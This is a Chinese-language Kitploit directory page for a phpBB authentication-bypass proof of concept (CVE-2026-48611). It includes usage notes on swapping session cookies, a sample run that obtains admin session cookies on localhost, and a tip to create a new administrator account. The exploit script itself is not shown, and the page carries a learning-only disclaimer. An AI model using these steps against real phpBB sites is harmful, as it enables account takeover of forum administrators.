Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-48611-phpBB — 绕过身份验证 | Kitploit
工具/GitHubGitHub/wanmywan/cve-2026-48611-phpbb
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubwanmywan/cve-2026-48611-phpbb

CVE-2026-48611-phpBB

绕过身份验证

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-48611-phpBB

绕过身份验证

简单的绕过身份验证PoC,如果想通过浏览器访问,别忘了根据浏览器显示的User-Agent更改脚本中的USER_AGENT变量,否则无法正常工作。使用Cookie编辑器替换_sid和_u的值。

影响版本:phpBB 3.3.16及以下 + 4.0.0-a2

root@kitploit:~
phpbb  python3 exploit.py https://localhost:8000 joushk
[+] Target:  https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36

[+] Session cookies obtained:
    phpbb3_cl7ge_u: 2
    phpbb3_cl7ge_k: 
    phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.

[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd

[!!!此脚本仅用于学习目的]

下载工具